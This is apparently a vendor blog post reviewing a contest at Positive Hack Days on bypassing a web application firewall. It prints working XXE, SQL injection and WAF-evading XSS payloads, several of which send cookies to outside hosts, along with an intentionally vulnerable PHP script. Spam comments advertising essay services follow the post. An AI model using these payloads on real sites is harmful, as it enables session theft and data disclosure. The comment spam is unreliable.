How much does it take to hack a mobile network?
Is electronic government secure
in the era of WikiLeaks and Anonymous?

Is SCADA hacking a Hollywood fiction
or the nowadays reality?
Internet banking: is there any chance to win
over the fraudsters?

Cyber-crimes, cyber-espionage, cyber-war: where do we draw a borderline?

Pages

Monday, July 14, 2014

Review of WAF Bypass Tasks

This year, the visitors of the Positive Hack Days Forum were invited to have a shot at bypassing the PT Application Firewall in the contest called WAF Bypass. It was a good opportunity for us to test our product in action, because the forum gathered the best information security experts. We had prepared a set of tasks for the contest, each representing a script with a typical vulnerability.

The participants were invited to use these vulnerabilities to get flags.  All tasks were solvable, though some solutions were not obvious. The contestants were provided with the report about scanning the tasks' source code with another Positive Technologies product Application Inspector. In this article, we will consider the contest tasks, bypassing methods, and the experience we have obtained.


1. XXE

The first task included a PHP-based XMLRPC server vulnerable to XML External Entities Injection. Here is this vulnerability detected by the Application Inspector:


This task was warm-up and the Application Firewall was configured to block only simple XXE:

<!DOCTYPE input [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><input>&xxe;</input>

For example, a participant could obtain the flag using parameter entities:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "flag" >
%xxe;
]>
<body>
<method a='a'>test</method>
</body>

Another way was through DOCTYPE:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE body SYSTEM "flag">
<body><method>test</method></body>

2. SQL Injection

In this task, the goal was to obtain the flag from the database using SQL Injection. Most contestants tried to bypass the filter instead of paying attention to the hint: it was necessary to find a weakness in the WAF configuration, which was improper data normalization. In fact, data normalization is amongst the most serious problems of modern WAFs. Improper implementation can give attackers protocol-level ways of firewall bypassing. As Stefan Esser mentioned in his presentation Shocking News in PHP Exploitation far back in 2009, WAF developers try to create a general HTTP parser for all existing implementation, which is obviously impossible. The approach implemented in the PT Application Firewall consists in normalization considering back-end peculiarities. In the task, normalization was disabled, which made the following bypass possible:

POST /news.php HTTP/1.1
Host: task2.waf-bypass.phdays.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: multipart/form-data; boundary=------,xxxx
Content-Length: 191

------,xxxx
Content-Disposition: form-data; name="img"; filename="img.gif"

GIF89a
------
Content-Disposition: form-data; name="id"

1' union select null,null,flag,null from flag limit 1 offset 1-- -
--------
------,xxxx--

PHP has its own unique parser of multipart data that takes the part of the Content-Type header before comma as boundary, while normal parsers take the entire string. Therefore, if there is no proper normalization, then the WAF will not check the parameter because it will see a file in it. However, PHP will recognize a regular parameter instead of file input and the payload will be successfully delivered.

3. httpOnly

This one and all subsequent tasks were about client-side vulnerabilities. We developed a bot in Selenium that had special cookies with a flag. The goal was to steal these cookies.

HttpOnly is a cookie flag restricting access via non-HTTP means such as JavaScript (hence the task name).

Here is the vulnerable script code:

<h4>httpOnly bypass</h4>
<p>In this task you need to bypass httpOnly and steal bot cookies using
<a href="http://waf-bypass.phdays.com/#bot">http://waf-bypass.phdays.com/#bot</a>.
All XSS checks are disabled, but there is an intentional bug, try to find it!</p>

<?php

if(!isset($_GET['name'])) die("<p>Please provide name</p>");

if($_SERVER['REMOTE_ADDR'] == '127.0.0.1') {
  setcookie('flag', $_GET['name'] . '-' . file_get_contents('./flag'));
} else {
  setcookie('flag', $_GET['name'] . '-' . md5(mt_rand()));
}

echo '<p>' . $_GET['name'] . '</p>';

?>

Let us draw your attention to the following: the user value gets into the cookie value and the input data is reflected to the response body as is. It is evident that if the bot follows a link with XSS, it will not send its cookies, because the Application Firewall has set the httpOnly flag. To bypass this protection mechanism, it was necessary to specify the string "httpOnly" in the cookie value, so that the WAF decided that the flag had been already set and it's not necessary to add another one.

httponly.php?name=<script>document.location.href='http://sniffer.com?'%2bdocument.cookie</script>;HttpOnly

4. Anomaly

In this task, the contestants were invited to examine the mechanism of anomalies detection that uses machine-learning algorithms the PT Application Firewall is based on. A statistical model was trained on a very loose subset of samples, and so it became overfit (i.e. considering too large specter of values as legitimate). The bypass method was to generate such s string that will fit the parameters of the trained statistical model. In this case, there also was a Cross-Site Scripting vulnerability, but the httpOnly property wasn't set. Even such weakened statistical model was bypassed only by two contestants:

aaaaaaaaaaaa  ... [snip] ... aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaav%3Cvideo+aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa+src=//secsem.ru+aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa+onerror=src%2b=document.cookie+aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/%3E

It should be mentioned that to "dilute" special characters detected by the WAF, the value of a tag attribute in another attribute was addressed. The latter attribute was located far enough for the string not to go beyond the threshold.

5. RegEx

In this task, the goal was to bypass a filter that uses regular expressions and to steal the bot's cookie. The essential part of any traditional WAF are signatures based on regular expressions. Here, we saw once more that a good WAF shouldn't count on regexps only. Some bypass methods are given below:

<img src = http://dsec.ru/bitrix/templates/dsec/img/logo.png onload = \"\\u0064\\u006F\\u0063\\u0075\\u006D\\u0065\\u006E\\u0074.write('<im\\u0067 src = http://sergeybelove.ru?ccc='%2b\\u0064\\u006F\\u0063\\u0075\\u006D\\u0065\\u006E\\u0074.cooki\\u0065%2b'>')\">

1%3Cvideo%20%20src%3dx%20onerror%3d%0Asrc='ht'%2b'tp:'%2b'//'+d\\u006fcument['\\x63ookie']%3E%3C/video%3E

<svg onload=\"var xStuff=HTMLElement['con'%2b'structor'],yStuff=xStuff('var img=new'%2b' Ima'%2b'ge('%2b') ;im'%2b'g.sr'%2b'c=\\'http:/'%2b'/labs.tom.vg/cookie=\\'%2bdoc'%2b'ument.coo'%2b'kie;doc'%2b'ument.doc'%2b'umentEl'%2b'ement.appe'%2b'ndCh'%2b'ild'%2b'('%2b'img) ;'),zStuff=yStuff()\">

6. Sanitize

In the last task, the contestants were invited to implement XSS after having bypassed a protection system that consisted in encoding of input values reflected in responses into HTML entities.

GET /sanitize.php?name=<script>alert(1)</script> HTTP/1.0

->

HTTP/1.0 200 OK
...
Hello, &lt;script&gt;alert(1)&lt;/script&gt;!

It seems that such protection is perfect, but there was a way to bypass it. To find the value entered by a user, the search is performed through the entire HTTP-response body, which can include other HTML tags as well. The bypass idea was to trick the WAF into escaping the tags already present in the response so that the target payload wasn't filtered.

Results

The winner was a Moscow State University team consisting of Georgiy Noseevich, Andrey Petukhov, and Alexander Razdobarov. They managed to solve all the tasks! Ivan Novikov (d0znpp) took the second place and Tom Van Goethem, a speaker from Belgium, was the third. All the three medal places were awarded with valuable prizes: Apple iPad Air, Sony Xperia Z2, and an annual license for Burp Suite Pro, respectively.


A bit of statistics: during the two contest days, 122 644 requests were blocked, 101 contestants registered and only 11 of them managed to obtain at least one flag.

Day one dynamics


Day two dynamics


Statistics by attacks


Statistics by tasks


By the way, we implemented cool visualization with logstalgia for this contest.



There we have it :)

Arseniy Reutov, Dmitriy Nagibin and PT Application Firewall Team

27 comments:

  1. Shut down in windows 10 are the important to know.

    ReplyDelete
  2. I like to write different reviews. But still I prefer to write reflection paper and it makes me happy for sure.

    ReplyDelete
  3. In the first part of WAF Evasion Techniques, we’ve seen how to bypass a WAF rule using wildcards and, more specifically, using the question mark wildcard. Obviously, there are many others ways to bypass a WAF Rule Set and I think that each attack has their specific evasion technique. mcdvoice

    ReplyDelete
  4. Wonderful Contest conducted by Positive Hack Days to test the Product.

    192.168.l.l from 192168ll

    ReplyDelete
  5. Java Assignment help
    All Assignment Help is a web portal where students get help in making assignments for all the subjects, with the help of our experts. You will get 100% plagiarism free assignment. Expert’s consultation is also available for students. If they have any query they can contact with our experts anytime.
    Law assignment help

    ReplyDelete
  6. you can go through AllAssignmentHelp.com reviews. It will help you to know about the services, and it will help you to know whether that site is reliable or not. This is a way of understanding the opinion of users, and it helps the website to maintain its functionality and reliability.

    ReplyDelete
  7. Myassignment Help, cater the best quality buy assignments online services to the college or university students at an affordable price. They can avail our excellent services to score good marks in their college and university. Our writer can write any complex homework assignments as they are well-versed with all academic topics.

    ReplyDelete
  8. If you are in need for online writing assistance for an intricate thesis topic, then avail our assignment writing service in U.S. and save your time to relax and do your studies properly. Our assignment help online service in USA has earned huge popularity among both domestic and international students. There’s no better place in the USA than MyAssignmenthelp. Contact us now to buy assignments online in the USA Leave your tensions to us and enjoy your free time.

    ReplyDelete
  9. This post is not just informative but impressive also. The post is so convincing that it created an urge to choose Assignment Help services. You can email us at Info@Myassignmenthelpau.Com or Phone Number: +61-2-8005-8227

    ReplyDelete
  10. You can easily get the best Students Assignment Helps services from the professional experts. Online writers works continue hard to supply you the best academic writing material and make you class topper. Simply visit at StudentsAssignmentHelp.com and get an opportunity to get academic success.

    ReplyDelete
  11. Best assignment writers are always online at Students Assignment Help for offering the essay writing service Singapore to students and complete their assignment without missing the deadline. Our professional writers can write assignment outstandingly provided to the students by their professor.

    ReplyDelete
  12. Nice Blog, Thanks for sharing this valuable information. Visit for
    Website Development Company in Delhi

    ReplyDelete
  13. My Assignment Services provides a 24-hour online Help with assignment or academic assistance and consultation to the students. Be it any subject such as Nursing, Economics, Law, Engineering, or Management, we provide the most reliable help with assignment online by our highly-proficient academic writers. This is because there are a multitude of online academic help services and picking the best is always going to be a trial and error method. However, My Assignment Services is a well-established and prominent name in the best Assignment help adelaide provider & high-quality instant assignment help online to students since almost a decade. You can trust our academic ghostwriters completely to get best quality write-ups including case studies, research proposals, dissertations and theses, and more. Australian Assignment Help providing experts understand that price is one of the major factors that university students consider before paying someone to do it for them. This is because university students often have stringent budgets and are already burdened with student debts. This is why we offer regular and seasonal discounts on Resume writing services or other assignments so that you achieve high distinction without burning a hole in your pocket.

    ReplyDelete
  14. A high-standard post with all imperative information about Assignment Help UK services. Looking forward to avail the premium services.

    ReplyDelete
  15. thanks for this information in really like it best hiv doctor in delhi

    ReplyDelete
  16. Glad to know about WAF Bypass Tasks. Keira, assignment help expert.

    ReplyDelete
  17. Myassignmenthelp provides the best assignment help for all students in Australia. Our professional expert writers provide academic assistance services to all students. Students can get help from our online assignment writers 24*7. For more offers visit Myassignment Help now.

    ReplyDelete
  18. Thank you very much for giving us this wonderful information. keep posting article like this.
    Appcake
    Cydia sources
    Showbox for iphone

    ReplyDelete
  19. Once you complete the payment, our assignment help experts start working on your assignment and you get a first class nursing assignment help Melbourne from us that fulfills your assignment requirements. A simple definition of Nursing is Care towards the society using appropriate diagnosis and treatment facilities.

    ReplyDelete
  20. Dear author of this article, I am so much thankful to you for this article! It is really very helpful for me right now, because I was just looking for any useful information about healthcare management capstone and could find nothing, unfortunately. But your article has provided a lot of answers to my questions and I am very thankful for this to you again. And I would like to add that it would be great if you will continue writing such articles and they will help to many people like me, I am completely sure in this.

    ReplyDelete
  21. Best and qualified writers at Students Assignment Help are providing physics assignment help services to the students. We never miss any of the deadlines. Our professional writers are available online always for students help.

    ReplyDelete
  22. Cdr for Engineers Australia must be a clean and precise report without even a single mistake. For immigrants, expert service is the best option in order to ensure that the report is free from errors. Experts, having good hold on the language, prepare the drafts with utmost proficiency.
    CDR expects appropriate evaluation of your engineering course as your immigration completely depends on it. Cdr Australia is just the thing you need at that moment! Only an expert understands the intricacy of immigrants and properly projects all the abilities and proficiencies in the CDR.

    ReplyDelete
  23. 30 inches weave hairNew games to ensure you always enjoy the best game, the most fun! You will never feel depressed 24 inches weave hair

    ReplyDelete